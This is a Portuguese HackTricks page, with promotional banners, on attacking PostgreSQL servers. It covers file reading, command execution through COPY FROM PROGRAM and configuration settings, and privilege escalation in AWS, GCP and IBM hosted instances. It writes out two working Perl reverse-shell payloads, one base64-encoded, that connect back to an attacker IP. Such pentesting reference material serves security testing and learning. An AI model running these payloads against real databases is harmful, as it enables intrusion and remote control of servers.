Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) para construir e **automatizar fluxos de trabalho** com as ferramentas comunitárias **mais avançadas** do mundo.\
<summary><strong>Aprenda AWS hacking do zero ao herói com</strong><ahref="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao grupo [**telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios do** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) no github.
Se ao executar **`\list`** você encontrar um banco de dados chamado **`rdsadmin`**, você sabe que está dentro de um **banco de dados postgresql da AWS**.
De acordo com [**esta pesquisa**](https://www.exploit-db.com/papers/13084), quando uma tentativa de conexão falha, `dblink` lança uma exceção `sqlclient_unable_to_establish_sqlconnection` incluindo uma explicação do erro. Exemplos desses detalhes estão listados abaixo.
`DETALHE: não foi possível conectar ao servidor: Sem rota para o host O servidor está em execução no host "1.2.3.4" e aceitando conexões TCP/IP na porta 5678?`
Infelizmente, parece não haver uma maneira de obter os detalhes da exceção dentro de uma função PL/pgSQL. Mas você pode obter os detalhes se conseguir se conectar diretamente ao servidor PostgreSQL. Se não for possível obter nomes de usuário e senhas diretamente das tabelas do sistema, o ataque de wordlist descrito na seção anterior pode ser bem-sucedido.
| rolsuper | Função tem privilégios de superusuário |
| rolinherit | Função herda automaticamente os privilégios das funções das quais é membro |
| rolcreaterole | Função pode criar mais funções |
| rolcreatedb | Função pode criar bancos de dados |
| rolcanlogin | Função pode fazer login. Ou seja, essa função pode ser dada como identificador de autorização de sessão inicial |
| rolreplication | Função é uma função de replicação. Uma função de replicação pode iniciar conexões de replicação e criar e excluir slots de replicação. |
| rolconnlimit | Para funções que podem fazer login, isso define o número máximo de conexões simultâneas que esta função pode fazer. -1 significa sem limite. |
| rolpassword | Não é a senha (sempre aparece como `********`) |
| rolvaliduntil | Tempo de expiração da senha (usado apenas para autenticação por senha); nulo se não houver expiração |
| rolbypassrls | Função ignora todas as políticas de segurança em nível de linha, veja [Seção 5.8](https://www.postgresql.org/docs/current/ddl-rowsecurity.html) para mais informações. |
| rolconfig | Padrões específicos da função para variáveis de configuração em tempo de execução |
Note que no Postgres um **usuário**, um **grupo** e uma **função** são a **mesma coisa**. Depende apenas de **como você usa** e se você **permite que faça login**.
A partir deste [**commit**](https://github.com/postgres/postgres/commit/0fdc8495bff02684142a44ab3bc5b18a8ca1863a), membros do grupo definido **`DEFAULT_ROLE_READ_SERVER_FILES`** (chamado **`pg_read_server_files`**) e **super usuários** podem usar o método **`COPY`** em qualquer caminho (confira `convert_and_check_filename` em `genfile.c`):
Existem **outras funções do postgres** que podem ser usadas para **ler um arquivo ou listar um diretório**. Apenas **superusuários** e **usuários com permissões explícitas** podem usá-las:
Você pode encontrar **mais funções** em [https://www.postgresql.org/docs/current/functions-admin.html](https://www.postgresql.org/docs/current/functions-admin.html)
Lembre-se de que o COPY não pode lidar com caracteres de nova linha, portanto, mesmo que você esteja usando um payload em base64, **você precisa enviar um comando de uma linha só**.\
Uma limitação muito importante desta técnica é que **`copy` não pode ser usado para escrever arquivos binários, pois ele modifica alguns valores binários.**
**Dica de bug bounty**: **inscreva-se** no **Intigriti**, uma plataforma premium de bug bounty criada por hackers, para hackers! Junte-se a nós em [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) hoje mesmo e comece a ganhar recompensas de até **$100,000**!
Desde a [versão 9.3](https://www.postgresql.org/docs/9.3/release-9-3.html), apenas **superusuários** e membros do grupo **`pg_execute_server_program`** podem usar o copy para RCE (exemplo com exfiltração:
#Notice that in order to scape a single quote you need to put 2 single quotes
COPY files FROM PROGRAM 'perl -MIO -e ''$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"192.168.0.104:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;''';
Mais informações sobre essa vulnerabilidade [**aqui**](https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5). Embora reportado como CVE-2019-9193, o Postgres declarou que isso era uma [funcionalidade e não será corrigido](https://www.postgresql.org/about/news/cve-2019-9193-not-a-security-vulnerability-1935/).
Depois de **aprender** no post anterior **como fazer upload de arquivos binários**, você pode tentar obter **RCE fazendo upload de uma extensão do postgresql e carregando-a**.
O **arquivo de configuração** do postgresql é **editável** pelo **usuário postgres**, que é quem executa o banco de dados, então como **superusuário** você pode escrever arquivos no sistema de arquivos, e portanto, você pode **sobrescrever este arquivo**.
*`ssl_passphrase_command = ''` Se o arquivo privado é protegido por senha (criptografado), o postgresql irá **executar o comando indicado neste atributo**.
*`ssl_passphrase_command_supports_reload = off`**Se** este atributo estiver **ativado**, o **comando** executado se a chave for protegida por senha **será executado** quando `pg_reload_conf()` for **executado**.
Ao testar isso, notei que isso só funcionará se o **arquivo de chave privada tiver privilégios 640**, for **propriedade do root** e do **grupo ssl-cert ou postgres** (para que o usuário postgres possa lê-lo), e estiver localizado em _/var/lib/postgresql/12/main_.
Para que isso funcione, a configuração `archive_mode` deve estar `'on'` ou `'always'`. Se isso for verdade, então poderíamos sobrescrever o comando em `archive_command` e forçá-lo a executar através das operações WAL (write-ahead logging).
2. Sobrescrever `archive_command` com o payload. Por exemplo, um shell reverso: `archive_command = 'echo "dXNlIFNvY2tldDskaT0iMTAuMC4wLjEiOyRwPTQyNDI7c29ja2V0KFMsUEZfSU5FVCxTT0NLX1NUUkVBTSxnZXRwcm90b2J5bmFtZSgidGNwIikpO2lmKGNvbm5lY3QoUyxzb2NrYWRkcl9pbigkcCxpbmV0X2F0b24oJGkpKSkpe29wZW4oU1RESU4sIj4mUyIpO29wZW4oU1RET1VULCI+JlMiKTtvcGVuKFNUREVSUiwiPiZTIik7ZXhlYygiL2Jpbi9zaCAtaSIpO307" | base64 --decode | perl'`
3. Recarregar a configuração: `SELECT pg_reload_conf()`
4. Forçar a operação WAL a ser executada, o que chamará o comando de arquivo: `SELECT pg_switch_wal()` ou `SELECT pg_switch_xlog()` para algumas versões do Postgres
**Mais** [**informações sobre esta configuração e sobre WAL aqui**](https://medium.com/dont-code-me-on-that/postgres-sql-injection-to-rce-with-archive-command-c8ce955cf3d3)**.**
De acordo com a [**documentação**](https://www.postgresql.org/docs/13/sql-grant.html): _Papéis com privilégio **`CREATEROLE`** podem **conceder ou revogar a associação em qualquer papel** que **não** seja um **superusuário**._
Portanto, se você tem permissão **`CREATEROLE`**, você poderia conceder a si mesmo acesso a outros **papéis** (que não sejam superusuário) que podem lhe dar a opção de ler e escrever arquivos e executar comandos:
É bastante comum encontrar que **usuários locais podem fazer login no PostgreSQL sem fornecer senha**. Portanto, uma vez que você tenha obtido **permissões para executar código**, você pode abusar dessas permissões para conceder a você o papel de **`SUPERUSER`**:
Neste [**relatório**](https://www.wiz.io/blog/the-cloud-has-an-isolation-problem-postgresql-vulnerabilities) é explicado como foi possível realizar **privesc** no Postgres GCP abusando do privilégio ALTER TABLE que foi concedido ao usuário.
Quando você tenta **tornar outro usuário proprietário de uma tabela**, deveria receber um **erro** impedindo isso, mas aparentemente o GCP deu essa **opção ao usuário postgres que não é superusuário** no GCP:
Combinando essa ideia com o fato de que quando os comandos **INSERT/UPDATE/**[**ANALYZE**](https://www.postgresql.org/docs/13/sql-analyze.html) são executados em uma **tabela com uma função de índice**, a **função** é **chamada** como parte do comando com as **permissões do proprietário da tabela**. É possível criar um índice com uma função e dar permissões de proprietário a um **superusuário** sobre essa tabela, e então executar ANALYZE na tabela com a função maliciosa que será capaz de executar comandos porque está usando os privilégios do proprietário.
2. Insira algum conteúdo fictício na tabela, para que a função de índice tenha algo com que trabalhar.
3. Crie uma função de índice maliciosa (com nosso payload de execução de código) na tabela.
4. ALTERE o proprietário da tabela para cloudsqladmin, a função de superusuário do GCP, usada apenas pelo Cloud SQL para manter e gerenciar o banco de dados.
5. ANALISE a tabela, forçando o motor do PostgreSQL a mudar o contexto do usuário para o proprietário da tabela (cloudsqladmin) e chamar a função de índice maliciosa com as permissões do cloudsqladmin, resultando na execução do nosso comando shell, o qual não tínhamos permissão para executar antes.
Algumas instâncias do postgresql mal configuradas podem permitir o login de qualquer usuário local, é possível fazer login a partir de 127.0.0.1 usando a **função `dblink`**:
Se você tem a senha de um usuário com mais privilégios, mas o usuário não tem permissão para fazer login a partir de um IP externo, você pode usar a seguinte função para executar consultas como esse usuário:
\*\*\*\*[**Neste relatório**](https://www.wiz.io/blog/hells-keychain-supply-chain-attack-in-ibm-cloud-databases-for-postgresql), pentesters conseguiram privesc dentro de uma instância postgres fornecida pela IBM, porque eles **encontraram esta função com a flag SECURITY DEFINER**:
Como [**explicado na documentação**](https://www.postgresql.org/docs/current/sql-createfunction.html), uma função com **SECURITY DEFINER é executada** com os privilégios do **usuário que a possui**. Portanto, se a função for **vulnerável a SQL Injection** ou estiver realizando algumas **ações privilegiadas com parâmetros controlados pelo atacante**, ela poderia ser abusada para **escalar privilégios dentro do postgres**.
PL/pgSQL, como uma **linguagem de programação completa**, permite muito mais controle procedural do que SQL, incluindo a **capacidade de usar loops e outras estruturas de controle**. Instruções SQL e gatilhos podem chamar funções criadas na linguagem PL/pgSQL.\
**Você pode abusar dessa linguagem para solicitar ao PostgreSQL que faça força bruta nas credenciais dos usuários.**
Você pode descriptografá-las usando a função _**decrypt**_ dentro do script: [https://github.com/postgres/pgadmin4/blob/master/web/pgadmin/utils/crypto.py](https://github.com/postgres/pgadmin4/blob/master/web/pgadmin/utils/crypto.py)
A autenticação do cliente é controlada por um arquivo de configuração frequentemente chamado _**pg\_hba.conf**_. Este arquivo possui um conjunto de registros. Um registro pode ter um dos seguintes sete formatos:
**Cada** registro **especifica** um **tipo de conexão**, um **intervalo de endereços IP do cliente** (se relevante para o tipo de conexão), um **nome de banco de dados**, um **nome de usuário** e o **método de autenticação** a ser usado para conexões que correspondam a esses parâmetros. O **primeiro registro com uma correspondência** de tipo de conexão, endereço do cliente, banco de dados solicitado e nome de usuário **é usado** para realizar a autenticação. Não há "continuação" ou "backup": **se um registro é escolhido e a autenticação falha, registros subsequentes não são considerados**. Se nenhum registro corresponder, o acesso é negado.\
Os métodos de autenticação **baseados em senha** são **md5**, **crypt** e **password**. Esses métodos operam de forma semelhante, exceto pela maneira como a senha é enviada pela conexão: respectivamente, hash MD5, criptografada com crypt e em texto claro. Uma limitação é que o método crypt não funciona com senhas que foram criptografadas em pg\_authid.
<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong><ahref="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao grupo [**telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios do GitHub** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) para construir e **automatizar fluxos de trabalho** facilmente, com as ferramentas comunitárias **mais avançadas** do mundo.\
